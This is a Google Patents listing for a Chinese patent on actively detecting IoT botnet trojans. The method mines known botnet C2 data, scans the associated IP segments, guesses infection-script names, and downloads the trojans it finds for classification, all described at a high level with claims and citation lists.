CN110798439B - Method, equipment and storage medium for actively detecting internet-of-things botnet trojan - Google Patents

Method, equipment and storage medium for actively detecting internet-of-things botnet trojan Download PDF

Info

Publication number
CN110798439B
CN110798439B CN201811025294.8A CN201811025294A CN110798439B CN 110798439 B CN110798439 B CN 110798439B CN 201811025294 A CN201811025294 A CN 201811025294A CN 110798439 B CN110798439 B CN 110798439B
Authority
CN
China
Prior art keywords
trojan
script
infection
information
internet
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Active
Application number
CN201811025294.8A
Other languages
Chinese (zh)
Other versions
CN110798439A (en
Inventor
严寒冰
黄云宇
丁丽
李佳
刘广柱
康学斌
郭晶
贾子骁
王小丰
肖新光
高胜
温森浩
李志辉
姚力
朱芸茜
王小群
张腾
吕利锋
陈阳
张世淙
徐剑
王适文
饶毓
肖崇蕙
张帅
吕志泉
韩志辉
马莉雅
雷君
周彧
周昊
高川
楼书逸
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
National Computer Network and Information Security Management Center
Beijing Antiy Network Technology Co Ltd
Original Assignee
National Computer Network and Information Security Management Center
Beijing Antiy Network Technology Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by National Computer Network and Information Security Management Center, Beijing Antiy Network Technology Co Ltd filed Critical National Computer Network and Information Security Management Center
Priority to CN201811025294.8A priority Critical patent/CN110798439B/en
Publication of CN110798439A publication Critical patent/CN110798439A/en
Application granted granted Critical
Publication of CN110798439B publication Critical patent/CN110798439B/en
Active legal-status Critical Current
Anticipated expiration legal-status Critical

Links

Images

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441Countermeasures against malicious traffic
    • H04L63/145Countermeasures against malicious traffic the attack involving the propagation of malware through the network, e.g. viruses, trojans or worms
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L2463/00Additional details relating to network architectures or network communication protocols for network security covered by H04L63/00
    • H04L2463/144Detection or countermeasures against botnets

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Health & Medical Sciences (AREA)
  • General Health & Medical Sciences (AREA)
  • Virology (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

The invention provides a method, equipment and a storage medium for actively detecting internet of things botnet trojans, wherein the method comprises the steps of obtaining control node information of the internet of things botnet trojans through known internet of things; extracting corresponding script file names as a script name dictionary set; actively carrying out full-port scanning detection on the high-frequency IP network segment to obtain and screen out fingerprint information of an important port; carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set; aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script; and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring. The invention also provides corresponding equipment, a device and a storage medium. By the method, the internet of things zombie network trojans can be actively acquired, and effective information is provided for subsequent monitoring and threat information acquisition.

Description

Method, equipment and storage medium for actively detecting internet-of-things botnet trojan
Technical Field
The invention relates to the field of network security, in particular to a method, equipment and a storage medium for actively detecting internet-of-things botnet trojans.
Background
The existing internet-of-things zombie network trojan capturing source is basically obtained by on-site evidence obtaining in an attack stage or captured in a honeypot in an infection stage of a trojan life cycle. The Trojan horse acquired by a field evidence obtaining mode has serious hysteresis and uncertainty; although the whole Internet of things trojans captured by honeypots can be captured early in the infection stage before the evidence is obtained on site, the result still cannot reach the optimal state due to the defects of passive capture and low coverage rate of honeypots, so that the effect of timely early warning of security threat situation is difficult to achieve due to the fact that the honeypots are not aware or even unconscious of the occurrence of security threat events. Therefore, effective coverage rate cannot be achieved by simply depending on site forensics or honeypot Trojan horse capture, a botnet of the Internet of things with high-level threats cannot be monitored in time, and tracing of related network attack events cannot be achieved.
Disclosure of Invention
Based on the problems, the invention provides a method, equipment and a storage medium for actively detecting internet of things botnet trojans, which can be used for acquiring automatic trojan infection scripts in time through actively detecting each port of the internet of things, pre-capturing a sample to the early stage of an infection stage and achieving higher detection coverage rate.
Firstly, the invention provides a method for actively detecting internet of things botnet trojans, which comprises the following steps:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
In the method, before extracting the information of each trojan control node, the method further includes: and classifying the Internet of things botnet trojans according to family versions.
In the method, the active full-port scanning detection is performed on the high-frequency IP network segment to acquire the fingerprint information of the port, and the method specifically comprises the following steps: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
In the method, the automatic infection script blind guess specifically comprises the following steps: and performing enumeration detection on the scripts possibly existing in the target port through an existing script name dictionary set.
The invention also provides equipment for actively detecting the internet of things botnet trojans, which comprises: a memory and a processor;
the memory stores a computer program operable on the processor, and a downloaded trojan program;
when the processor runs the computer program, the following steps are realized:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
The device further comprises, before extracting the information of each Trojan control node: and classifying the Internet of things botnet trojans according to family versions.
In the device, the active full-port scanning detection is performed on the high-frequency IP network segment to acquire the fingerprint information of the port, and the method specifically comprises the following steps: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
In the equipment, the automatic infection script blind guess specifically comprises the following steps: and performing enumeration detection on the scripts possibly existing in the target port through an existing script name dictionary set.
The invention also provides a device for actively detecting the internet of things botnet trojans, which comprises:
the information extraction module is used for acquiring the known internet of things botnet trojans and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
the script name dictionary set creation module extracts all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performs duplication removal to serve as a script name dictionary set;
the information sorting module is used for sorting and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
the fingerprint information acquisition module is used for actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of the port;
the fingerprint information classification module is used for classifying the acquired fingerprint information and screening out important fingerprint information according to the importance degree;
the blind guessing module is used for carrying out automatic blind guessing of the infection script on the target port with the important fingerprint information according to the script name dictionary set;
the link extraction module is used for extracting Trojan download links stored in the automatic infection script aiming at the automatic infection script obtained by blind guess;
and the downloading module is used for downloading the Trojan according to the Trojan downloading link, detecting and identifying the Trojan, classifying the Trojan and providing information for subsequent Trojan monitoring.
The invention also proposes a non-transitory computer-readable storage medium having stored thereon a computer program which, when executed by a processor, implements a method of actively detecting internet of things botnet trojans as described in any one of the above.
The method has the advantages that the IP network segment scanning detection of the common horse release site of the botnet of the Internet of things can be actively realized through an active detection technology, the automatic Trojan infection script is timely obtained in a blind guessing mode, and the purpose that the sample capture is advanced to the early stage of the infection stage with higher coverage rate is realized. Meanwhile, the main scanning IP network segment object is the historical Internet of things C2 or the IP network segment where the horse-racing station is located, accurate correlation IP/16 network segment scanning is achieved, and scanning efficiency is improved. The method and the process for capturing the internet of things botnet trojans are mainly optimized, and the efficiency and the coverage rate of capturing the internet of things trojans are effectively improved, so that effective information is provided for subsequent monitoring and threat information acquisition of the internet of things botnets.
The invention provides a method, equipment and a storage medium for actively detecting internet of things botnet trojans, wherein the method comprises the steps of obtaining control node information of the internet of things botnet trojans through known internet of things; extracting corresponding script file names as a script name dictionary set; actively carrying out full-port scanning detection on the high-frequency IP network segment to obtain and screen out fingerprint information of an important port; carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set; aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script; and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring. The invention also provides corresponding equipment, a device and a storage medium. By the method, the internet of things zombie network trojans can be actively acquired, and effective information is provided for subsequent monitoring and threat information acquisition.
Drawings
In order to more clearly illustrate the technical solutions of the present invention or the prior art, the drawings needed to be used in the description of the embodiments or the prior art will be briefly described below, and it is obvious that the drawings in the following description are only some embodiments described in the present invention, and it is obvious for those skilled in the art to obtain other drawings based on these drawings without creative efforts.
FIG. 1 is a flowchart of an embodiment of a method for actively detecting a botnet Trojan horse of the Internet of things according to the present invention;
FIG. 2 is a schematic structural diagram of an apparatus for actively detecting a botnet Trojan horse of the Internet of things according to the present invention;
fig. 3 is a schematic structural diagram of a device for actively detecting internet of things botnet trojans.
Detailed Description
In order to make the technical solutions in the embodiments of the present invention better understood and make the above objects, features and advantages of the present invention more comprehensible, the technical solutions of the present invention are described in further detail below with reference to the accompanying drawings.
First, the invention provides a method for actively detecting internet of things botnet trojans, as shown in fig. 1, comprising the following steps:
s101: acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
known internet of things botnet trojans such as Mirai, Gafgyt and other internet of things family botnet trojans frequently used by hackers;
the control node information comprises C2(IP/Domain + Port) hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
s102: extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
s103: classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment; by the method, historical internet of things C2 high-frequency centralized IP network segments can be integrated;
s104: actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
s105: classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
this step can be with key service port fingerprint information data strict screening and the rubbish fingerprint noise of elimination. For example, Apache fingerprint data of an 80 port is focused, accurate information data is provided for later automatic infection script detection, and service fingerprint information data which is not Aparche is eliminated.
S106: carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set;
s107: aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
the automatic infection scripts store download links URL of the trojans, so that automatic sorting and extraction of the trojan download links in the automatic infection scripts are required to be realized, and the download links are provided for automatic trojan download in the next stage;
s108: and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
In the method, before extracting the information of each trojan control node, the method further includes: and classifying the Internet of things botnet trojans according to family versions.
In the method, the active full-port scanning detection is performed on the high-frequency IP network segment to acquire the fingerprint information of the port, and the method specifically comprises the following steps: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
In the method, the automatic infection script blind guess specifically comprises the following steps: and performing enumeration detection on the scripts possibly existing in the target port through an existing script name dictionary set.
The invention also provides equipment for actively detecting the botnet trojans of the internet of things, which comprises the following components as shown in fig. 2: a memory 201 and a processor 202;
the memory stores a computer program operable on the processor, and a downloaded trojan program;
when the processor runs the computer program, the following steps are realized:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
The device further comprises, before extracting the information of each Trojan control node: and classifying the Internet of things botnet trojans according to family versions.
In the device, the active full-port scanning detection is performed on the high-frequency IP network segment to acquire the fingerprint information of the port, and the method specifically comprises the following steps: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
In the equipment, the automatic infection script blind guess specifically comprises the following steps: and performing enumeration detection on the scripts possibly existing in the target port through an existing script name dictionary set.
The invention also provides a device for actively detecting the internet of things botnet trojans, which comprises the following components as shown in fig. 3:
the information extraction module 301 is used for acquiring the known internet of things botnet trojans and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
a script name dictionary set creating module 302 for extracting all infection script file names in the automatic Internet of things Trojan horse infection script download link and removing duplication to serve as a script name dictionary set;
the information sorting module 303 is used for sorting and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
the fingerprint information acquisition module 304 is used for actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of the port;
a fingerprint information classification module 305 for classifying the acquired fingerprint information and screening out important fingerprint information according to the importance degree;
the blind guessing module 306 is used for carrying out automatic blind guessing of the infection script on the target port with the important fingerprint information according to the script name dictionary set;
a link extraction module 307, which extracts the trojan download link stored in the automatic infection script aiming at the automatic infection script obtained by blind guess;
and the downloading module 308 downloads the trojan according to the trojan downloading link, detects and identifies the trojan, classifies the trojan, and provides information for subsequent trojan monitoring.
The invention also proposes a non-transitory computer-readable storage medium having stored thereon a computer program which, when executed by a processor, implements a method of actively detecting internet of things botnet trojans as described in any one of the above.
The method has the advantages that the IP network segment scanning detection of the common horse release site of the botnet of the Internet of things can be actively realized through an active detection technology, the automatic Trojan infection script is timely obtained in a blind guessing mode, and the purpose that the sample capture is advanced to the early stage of the infection stage with higher coverage rate is realized. Meanwhile, the main scanning IP network segment object is the historical Internet of things C2 or the IP network segment where the horse-racing station is located, accurate correlation IP/16 network segment scanning is achieved, and scanning efficiency is improved. The method and the process for capturing the internet of things botnet trojans are mainly optimized, and the efficiency and the coverage rate of capturing the internet of things trojans are effectively improved, so that effective information is provided for subsequent monitoring and threat information acquisition of the internet of things botnets.
The invention provides a method, equipment and a storage medium for actively detecting internet of things botnet trojans, wherein the method comprises the steps of obtaining control node information of the internet of things botnet trojans through known internet of things; extracting corresponding script file names as a script name dictionary set; actively carrying out full-port scanning detection on the high-frequency IP network segment to obtain and screen out fingerprint information of an important port; carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set; aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script; and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring. The invention also provides corresponding equipment, a device and a storage medium. By the method, the internet of things zombie network trojans can be actively acquired, and effective information is provided for subsequent monitoring and threat information acquisition.
From the above description of the embodiments, it is clear to those skilled in the art that the present invention can be implemented by software plus necessary general hardware platform. With this understanding in mind, the technical solutions of the present invention may be embodied in the form of a software product, which can be stored in a storage medium, or a part thereof that contributes to the prior art.
The embodiments in the present specification are described in a progressive manner, and the same and similar parts among the embodiments are referred to each other, and each embodiment focuses on the differences from the other embodiments. In particular, for the system embodiment, since it is substantially similar to the method embodiment, the description is simple, and for the relevant points, reference may be made to the partial description of the method embodiment.
While the present invention has been described with respect to the embodiments, those skilled in the art will appreciate that there are numerous variations and permutations of the present invention without departing from the spirit of the invention, and it is intended that the appended claims cover such variations and modifications as fall within the true spirit of the invention.

Claims (8)

1. A method for actively detecting Internet of things botnet trojans is characterized by comprising the following steps:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
according to the script name dictionary set, carrying out automatic infection script blind guessing on a target port with important fingerprint information, wherein the automatic infection script blind guessing specifically comprises the following steps: enumerating and detecting scripts possibly existing in a target port through an existing script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
2. The method of claim 1, further comprising, prior to said extracting each trojan control node information: and classifying the Internet of things botnet trojans according to family versions.
3. The method of claim 1, wherein the active full port scanning probing of the high frequency IP network segment to obtain the fingerprint information of the port specifically comprises: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
4. The utility model provides an equipment of thing networking zombie network Trojan is initiatively surveyed which characterized in that includes: a memory and a processor;
the memory stores a computer program operable on the processor, and a downloaded trojan program;
when the processor runs the computer program, the following steps are realized:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
according to the script name dictionary set, carrying out automatic infection script blind guessing on a target port with important fingerprint information, wherein the automatic infection script blind guessing specifically comprises the following steps: enumerating and detecting scripts possibly existing in a target port through an existing script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
5. The apparatus as claimed in claim 4, further comprising, before said extracting the respective trojan control node information: and classifying the Internet of things botnet trojans according to family versions.
6. The device according to claim 4, wherein the active full port scanning probing of the high frequency IP network segment to obtain the fingerprint information of the port specifically comprises: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
7. The utility model provides a device of thing networking zombie network Trojan is initiatively surveyed which characterized in that includes:
the information extraction module is used for acquiring the known internet of things botnet trojans and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
the script name dictionary set creation module extracts all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performs duplication removal to serve as a script name dictionary set;
the information sorting module is used for sorting and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
the fingerprint information acquisition module is used for actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of the port;
the fingerprint information classification module is used for classifying the acquired fingerprint information and screening out important fingerprint information according to the importance degree;
the blind guess module carries out automatic blind guess of the infection script on the target port with important fingerprint information according to the script name dictionary set, and the automatic blind guess of the infection script specifically comprises the following steps: enumerating and detecting scripts possibly existing in a target port through an existing script name dictionary set;
the link extraction module is used for extracting Trojan download links stored in the automatic infection script aiming at the automatic infection script obtained by blind guess;
and the downloading module is used for downloading the Trojan according to the Trojan downloading link, detecting and identifying the Trojan, classifying the Trojan and providing information for subsequent Trojan monitoring.
8. A non-transitory computer readable storage medium having stored thereon a computer program, which when executed by a processor, implements the method of actively detecting internet of things botnet trojans of any one of claims 1-3.
CN201811025294.8A 2018-09-04 2018-09-04 Method, equipment and storage medium for actively detecting internet-of-things botnet trojan Active CN110798439B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201811025294.8A CN110798439B (en) 2018-09-04 2018-09-04 Method, equipment and storage medium for actively detecting internet-of-things botnet trojan

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201811025294.8A CN110798439B (en) 2018-09-04 2018-09-04 Method, equipment and storage medium for actively detecting internet-of-things botnet trojan

Publications (2)

Publication Number Publication Date
CN110798439A CN110798439A (en) 2020-02-14
CN110798439B true CN110798439B (en) 2022-04-19

Family

ID=69425767

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201811025294.8A Active CN110798439B (en) 2018-09-04 2018-09-04 Method, equipment and storage medium for actively detecting internet-of-things botnet trojan

Country Status (1)

Country Link
CN (1) CN110798439B (en)

Citations (9)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101651579A (en) * 2009-09-15 2010-02-17 成都市华为赛门铁克科技有限公司 Method and gateway device for identifying Botnet
CN101673326A (en) * 2008-09-11 2010-03-17 北京理工大学 Method for detecting web page Trojan horse based on program execution characteristics
CN102546298A (en) * 2012-01-06 2012-07-04 北京大学 Botnet family detection method based on active probing
CN102955913A (en) * 2011-08-25 2013-03-06 腾讯科技(深圳)有限公司 Method and system for detecting hung Trojans of web page
CN103973664A (en) * 2013-01-28 2014-08-06 信息安全有限公司 Webshell detection and response system
CN106603521A (en) * 2016-12-09 2017-04-26 北京安天电子设备有限公司 Network control node detection method and system
CN106982188A (en) * 2016-01-15 2017-07-25 阿里巴巴集团控股有限公司 The detection method and device in malicious dissemination source
CN107463844A (en) * 2016-06-06 2017-12-12 国家计算机网络与信息安全管理中心 WEB Trojan detecting methods and system
CN108156174A (en) * 2018-01-15 2018-06-12 深圳市联软科技股份有限公司 Botnet detection method, device, equipment and medium based on the analysis of C&C domain names

Family Cites Families (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US9142102B2 (en) * 2013-07-02 2015-09-22 Icf International Method and apparatus for visualizing network security alerts

Patent Citations (9)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101673326A (en) * 2008-09-11 2010-03-17 北京理工大学 Method for detecting web page Trojan horse based on program execution characteristics
CN101651579A (en) * 2009-09-15 2010-02-17 成都市华为赛门铁克科技有限公司 Method and gateway device for identifying Botnet
CN102955913A (en) * 2011-08-25 2013-03-06 腾讯科技(深圳)有限公司 Method and system for detecting hung Trojans of web page
CN102546298A (en) * 2012-01-06 2012-07-04 北京大学 Botnet family detection method based on active probing
CN103973664A (en) * 2013-01-28 2014-08-06 信息安全有限公司 Webshell detection and response system
CN106982188A (en) * 2016-01-15 2017-07-25 阿里巴巴集团控股有限公司 The detection method and device in malicious dissemination source
CN107463844A (en) * 2016-06-06 2017-12-12 国家计算机网络与信息安全管理中心 WEB Trojan detecting methods and system
CN106603521A (en) * 2016-12-09 2017-04-26 北京安天电子设备有限公司 Network control node detection method and system
CN108156174A (en) * 2018-01-15 2018-06-12 深圳市联软科技股份有限公司 Botnet detection method, device, equipment and medium based on the analysis of C&C domain names

Also Published As

Publication number Publication date
CN110798439A (en) 2020-02-14

Similar Documents

Publication Publication Date Title
CN108156174B (en) Botnet detection method, device, equipment and medium based on C & C domain name analysis
US10873594B2 (en) Test system and method for identifying security vulnerabilities of a device under test
CN108768917B (en) Botnet detection method and system based on weblog
CN103685598B (en) Method and device for discovering active IP address in IPv6 network
CN110677438A (en) Attack chain construction method, device, equipment and medium
CN104850780A (en) Discrimination method for advanced persistent threat attack
CN111818103A (en) Traffic-based tracing attack path method in network target range
JP6174520B2 (en) Malignant communication pattern detection device, malignant communication pattern detection method, and malignant communication pattern detection program
JP5739034B1 (en) Attack detection system, attack detection device, attack detection method, and attack detection program
CN111314276A (en) Method, device and system for detecting multiple attack behaviors
CN112818352B (en) Database detection method and device, storage medium and electronic device
CN113901475A (en) Fuzzy mining method for input verification vulnerability of industrial control terminal equipment
CN106911665B (en) Method and system for identifying malicious code weak password intrusion behavior
CN105656730A (en) Network application quick discovery method and system based on TCP data packet
CN109474567B (en) DDOS attack tracing method and device, storage medium and electronic equipment
CN112769635B (en) Service identification method and device for multi-granularity feature analysis
CN112217777A (en) Attack backtracking method and equipment
CN113676497A (en) Data blocking method and device, electronic equipment and storage medium
CN110798439B (en) Method, equipment and storage medium for actively detecting internet-of-things botnet trojan
CN106411951B (en) Network attack behavior detection method and device
CN111885034A (en) Internet of things attack event tracking method and device and computer equipment
CN105827627A (en) Method and apparatus for acquiring information
Hang et al. “Infect-me-not”: A User-centric and Site-centric Study of web-based malware
EP3361405B1 (en) Enhancement of intrusion detection systems
US9049170B2 (en) Building filter through utilization of automated generation of regular expression

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination
GR01 Patent grant
GR01 Patent grant